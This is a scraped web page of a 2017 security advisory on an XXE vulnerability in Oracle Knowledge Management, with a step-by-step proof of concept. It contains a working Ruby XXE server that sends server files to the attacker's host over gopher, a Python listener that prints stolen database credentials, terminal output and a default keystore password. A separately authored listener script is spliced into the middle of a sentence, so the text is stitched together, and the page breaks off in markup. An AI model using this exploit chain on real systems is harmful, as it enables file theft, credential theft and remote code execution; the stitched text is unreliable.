{"id":7034,"date":"2017-03-19T14:19:48","date_gmt":"2017-03-19T22:19:48","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/19\/news-825\/"},"modified":"2017-03-19T14:19:48","modified_gmt":"2017-03-19T22:19:48","slug":"news-825","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/03\/19\/news-825\/","title":{"rendered":"SSD Advisory \u2013 Oracle Knowledge Management XXE Leading to a RCE"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz | Date: Sun, 19 Mar 2017 08:05:05 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an XML External Entity (XXE) vulnerability in Oracle Knowledge Management version 8.5.1. The flaw allows out-of-band disclosure of files on the server, including the database configuration, and can be chained into remote code execution.<\/p>\n<p>By enabling searches across a wide variety of sources, Oracle&#8217;s InQuira knowledge management products offer simple and convenient ways for users to access knowledge that was once hidden in the myriad systems, applications, and databases used to store enterprise content.<\/p>\n<p>Oracle&#8217;s products for knowledge management help users find useful knowledge contained in corporate information stores.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Steven Seeley, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Oracle has released patches to address this vulnerability; for more details see: <a href=\"http:\/\/www.oracle.com\/technetwork\/security-advisory\/cpujul2016-2881720.html\" target=\"_blank\">http:\/\/www.oracle.com\/technetwork\/security-advisory\/cpujul2016-2881720.html<\/a>.<\/p>\n<p><span id=\"more-3052\"><\/span><\/p>\n
<p><strong>Vulnerability Details<\/strong><br \/> The vulnerable code is in <em>\/imws\/Result.jsp<\/em>. When called, it can be made to fetch and parse an XML document from a third-party server. Because that server can be under the attacker&#8217;s control, the document it serves can declare external entities that reference files present locally on the victim&#8217;s server and send their contents to an attacker-controlled listener.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>To exploit the vulnerability, we run the following five steps (the first two run in the background):<\/p>\n<ol>\n<li>&#8216;Malicious&#8217; XML External Entity (XXE) server<\/li>\n<li>Listener for the gopher protocol<\/li>\n<li>Attacker pulls the &#8216;custom.xml&#8217; file through the XXE<\/li>\n<li>Decrypt\/crack the encrypted AES password<\/li>\n<li>Shell on the machine<\/li>\n<\/ol>\n<p>This image illustrates the steps this attack requires and the sequence of events that happen behind the scenes:<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/oracle_xxe_process.png\"><img src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/oracle_xxe_process-1024x600.png\" alt=\"Sequence of events in the attack\" width=\"1024\" height=\"600\" class=\"alignnone wp-image-3054\" \/><\/a><\/p>\n
<p>Step 1 &#8211; set up a &#8216;malicious&#8217; XML External Entity (XXE) server:<\/p>\n<pre>x@pluto:~\/xxe$ ruby xxeserve.rb -o 0.0.0.0\n[2015-02-09 16:03:45] INFO  WEBrick 1.3.1\n[2015-02-09 16:03:45] INFO  ruby 1.9.3 (2013-11-22) [x86_64-linux]\n== Sinatra\/1.4.5 has taken the stage on 4567 for development with backup from WEBrick\n[2015-02-09 16:03:45] INFO  WEBrick::HTTPServer#start: pid=18862 port=4567\n172.16.77.128 - - [09\/Feb\/2015:16:04:10 +1100] \"GET \/xml?f=C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml HTTP\/1.1\" 200 173 0.0089\n172.16.77.128 - - [09\/Feb\/2015:16:04:10 AEDT] \"GET \/xml?f=C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml HTTP\/1.1\" 200 173\n- -&gt; \/xml?f=C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml<\/pre>\n
<p>Step 2 &#8211; set up a listener for the gopher protocol:<\/p>\n<pre>x@pluto:~\/xxe$ .\/gopher.py\nstarting up on 0.0.0.0 port 1337\nwaiting for a connection\nconnection from ('172.16.77.128', 50746)\n(+) The database SID is: jdbc:oracle:thin:@WIN-U94QE7O15KE:1521:IM\n(+) The database username is: SYS as SYSDBA\n(+) The database password is: VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=<\/pre>\n
<p>Step 3 &#8211; steal the &#8216;custom.xml&#8217; file:<\/p>\n<pre>x@pluto:~\/xxe$ .\/poc.py\n(+) pulling custom.xml for the db password...\n(!) Success! please check the gopher.py window!<\/pre>\n
<p>Step 4 &#8211; decrypt\/crack the encrypted AES password:<\/p>\n<p>NOTE: you will need to brute-force the encryption key, which is contained in the wallet. Oracle Knowledge uses &#8216;OracleKnowledge1&#8217; as the wallet\/keystore password, but you will most likely not have the wallet or keystore, in which case a dictionary attack is used to find the password.<\/p>\n<pre>x@pluto:~\/xxe$ .\/decrypt.sh VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=\n(+) Decrypting... \"VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=\"\nResult: \"password\"<\/pre>\n
<p>Step 5 &#8211; get a shell<br \/> Using the recovered database credentials, log in to the database remotely and execute code. 
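Step 2 runs a listener (gopher.py) whose source the advisory does not include. The script below is an added example written for this edit, in Ruby to match xxeserve.rb; it is not the advisory's gopher.py and not Oracle's code. It shows the receiving side of the out-of-band channel: the external DTD makes the victim's parser resolve gopher://attacker:1337/?%payl; so the leaked file arrives inside the gopher selector string. It assumes, per RFC 1436, that the client sends the selector terminated by CRLF and that the selector is the URL path after the host, i.e. "/?" followed by the file. The JDBC connection string is matched generically; the username and password fields the advisory's tool prints depend on the layout of custom.xml, which the page does not show, so the element name in the constructed sample is hypothetical.

```ruby
#!/usr/bin/env ruby
# Added example, not the advisory's gopher.py: a receiver for the
# out-of-band channel that xxeserve.rb sets up. The external DTD makes the
# victim's parser resolve
#     gopher://<attacker>:1337/?<contents of the leaked file>
# so the file travels inside the gopher selector string.
# Assumptions: the client sends the selector followed by CRLF (RFC 1436)
# and the selector is the URL path after the host, i.e. "/?" + file.
require 'socket'
require 'timeout'

# The JDBC connection string is the one item we can recognise generically.
JDBC_URL_RE = /jdbc:oracle:thin:@[^\s"'<>]+/

# Constructed sample of what the listener receives (hypothetical element
# name; the real layout of custom.xml is not shown in the advisory).
SAMPLE_REQUEST = "/?<db>jdbc:oracle:thin:@WIN-U94QE7O15KE:1521:IM</db>\r\n"

# Recover the leaked file from the raw bytes the gopher client sent:
# drop the terminating CRLF and the leading "/?" (or "/<type>?") the URL
# form adds, then percent-decode only well-formed %XX triplets so that
# characters such as the "+" in a base64 password survive when the client
# did not encode the selector at all.
def decode_selector(raw)
  sel = raw.b.sub(/\r?\n\z/, '').sub(%r{\A/.?\?}, '')
  out = sel.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
  out.force_encoding(Encoding::UTF_8)
  out.valid_encoding? ? out : out.force_encoding(Encoding::BINARY)
end

# Return the decoded text plus every JDBC URL found in it. The advisory's
# tool also prints the username and password fields of custom.xml; their
# element names are not on the page, so they are not parsed here.
def extract(raw)
  text = decode_selector(raw)
  { text: text, jdbc_urls: text.scan(JDBC_URL_RE) }
end

# Accept one connection at a time. The leaked file spans several lines, so
# read until the client closes the socket rather than stopping at the first
# CRLF; the timeout covers a client that holds the socket open waiting for
# a gopher reply.
def run_listener(host = '0.0.0.0', port = 1337, read_timeout = 2)
  server = TCPServer.new(host, port)
  puts "starting up on #{host} port #{port}"
  loop do
    puts 'waiting for a connection'
    client = server.accept
    puts "connection from #{client.peeraddr[3]}:#{client.peeraddr[1]}"
    raw = String.new
    begin
      Timeout.timeout(read_timeout) { loop { raw << client.readpartial(4096) } }
    rescue EOFError, Timeout::Error
      # EOF: client finished; timeout: use whatever arrived so far
    end
    client.close
    found = extract(raw)
    found[:jdbc_urls].each { |u| puts "(+) JDBC URL: #{u}" }
    puts '(+) leaked file:'
    puts found[:text]
  end
end

# Usage: ruby gopher_listen.rb listen
run_listener if __FILE__ == $0 && ARGV.first == 'listen'
```

Reading to EOF or timeout instead of to the first CRLF is the one design choice that matters here: the selector carries a whole multi-line file, and a gopher client that expects a reply will not close its side first. Percent-decoding only valid %XX triplets keeps the base64 password intact whether or not the client encoded the URL.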
You may also find another configuration file on the system that will allow you a more &#8216;direct&#8217; way to obtain a SYSTEM shell.<\/p>\n<p><strong>xxeserve.rb<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58cf040336fbf386262268\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; 
font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env ruby  # Notes:  # &#8211; This is the out of band xxe server that is used to retrieve the file and send it via the gopher protocol  # &#8211; ruby xxeserve.rb -o 0.0.0.0    require &#8216;sinatra&#8217;    get &#8220;\/&#8221; do    return &#8220;OHAI&#8221; if params[:p].nil?    f = File.open(&#8220;.\/files\/#{request.ip}#{Time.now.to_i}&#8221;,&#8221;w&#8221;)    f.write(params[:p])    f.close    &#8220;&#8221;  end    get &#8220;\/xml&#8221; do    return &#8220;&#8221; if params[:f].nil?    &lt;&lt;END    &lt;!ENTITY % payl SYSTEM &#8220;file:\/\/\/#{params[:f]}&#8221;&gt;  &lt;!ENTITY % int &#8220;&lt;!ENTITY &amp;#37; trick SYSTEM &#8216;gopher:\/\/#{request.host}:1337\/?%payl;&#8217;&gt;&#8221;&gt;  END  end<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-58cf040336fbf386262268-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env ruby<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-2\"><span class=\"crayon-p\"># Notes:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-3\"><span class=\"crayon-p\"># &#8211; This is the out of band xxe server that is used to retrieve the file and send it via the gopher protocol<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-4\"><span class=\"crayon-p\"># &#8211; ruby xxeserve.rb -o 0.0.0.0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-6\"><span class=\"crayon-i\">require<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;sinatra&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-8\"><span class=\"crayon-i\">get<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">do<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;OHAI&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nil<\/span><span class=\"crayon-sy\">?<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">File<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;.\/files\/#{request.ip}#{Time.now.to_i}&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-s\">&#8220;w&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-14\"><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-16\"><span class=\"crayon-i\">get<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/xml&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">do<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nil<\/span><span class=\"crayon-sy\">?<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-19\"><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-st\">END<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-20\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">ENTITY<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">payl <\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;file:\/\/\/#{params[:f]}&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-21\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">ENTITY<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&lt;!ENTITY &amp;#37; trick SYSTEM &#8216;gopher:\/\/#{request.host}:1337\/?%payl;&#8217;&gt;&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-22\"><span class=\"crayon-st\">END<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-23\"><span class=\"crayon-st\">end<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p><strong>gopher.py<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58cf040336fc1447319366\" class=\"crayon-syntax 
crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python  # Notes:  # &#8211; This code just listens for client requests on port 1337  # &#8211; it looks for database strings and prints them out    import socket  import sys  import re    # Create a TCP\/IP socket  sock = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM)    # Bind the socket to the port  server_address = (&#8216;0.0.0.0&#8217;, 1337)  print &gt;&gt;sys.stderr, &#8216;starting up on %s port %s&#8217; % server_address      sock.bind(server_address)  \t  # Listen for incoming connections  sock.listen(1)    while True:      # Wait for a connection      print &gt;&gt;sys.stderr, &#8216;waiting for a connection&#8217;      connection, client_address = sock.accept()      try:          print &gt;&gt;sys.stderr, &#8216;connection from&#8217;, client_address            # Receive the data in small chunks and retransmit it          while True:              data = connection.recv(2048)                            if data:  \t\t\t\t#print data  \t\t\t\tmatchuser = re.search(&#8220;&lt;user&gt;(.*)&lt;\/user&gt;&#8221;, data)  \t\t\t\tmatchpassword = re.search(&#8220;&lt;password&gt;(.*)&lt;\/password&gt;&#8221;, data)  \t\t\t\tmatchurl = re.search(&#8220;&lt;url&gt;(.*)&lt;\/url&gt;&#8221;, data)  \t\t\t\tif matchuser and matchpassword and matchurl:  \t\t\t\t\tprint &#8220;(+) The database SID is: %s&#8221; % matchurl.group(1)  \t\t\t\t\tprint &#8220;(+) The database username is: %s&#8221; % matchuser.group(1)  \t\t\t\t\tprint &#8220;(+) The database password is: %s&#8221; % matchpassword.group(1)  \t\t\t\t\tconnection.close()  \t\t\t\t\tsys.exit(1)  \t\t\t\tconnection.close()  \t\t\t\tsys.exit(1)              else:                  print &gt;&gt;sys.stderr, &#8216;no more data from&#8217;, client_address                  break                    except Exception:  \t    connection.close()  \t\t      finally:          # Clean up the connection          connection.close()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" 
data-line=\"crayon-58cf040336fc1447319366-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-58cf040336fc1447319366-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-42\">42<\/div>\n<div class=\"crayon-num\" 
